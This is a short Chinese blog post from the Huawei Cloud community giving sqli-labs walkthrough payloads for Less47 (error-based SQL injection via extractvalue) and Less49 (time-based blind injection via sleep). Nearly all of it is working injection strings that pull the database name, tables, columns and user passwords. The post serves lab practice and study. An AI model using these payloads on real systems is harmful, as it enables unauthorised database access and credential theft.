SQL注入 Less47(报错注入) 和Less49(时间盲注)

举报
开心星人 发表于 2022/09/26 20:34:24 2022/09/26
【摘要】 Less47和Less49都用不了rand()布尔盲注因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的 Less47?sort=1' and extractvalue(0,concat(0x7e,database()))--+?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_na...

Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合
order by 'rand()' 这条语句显然是执行不了的

Less47

?sort=1' and extractvalue(0,concat(0x7e,database()))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+

?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+

?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+

Less49

?sort=1' and sleep(5)--+

?sort=1' and if(1,sleep(5),0)--+

?sort=1' and if(length(database())=8,sleep(5),0)--+

?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+

?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+

?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+

?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
Less
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入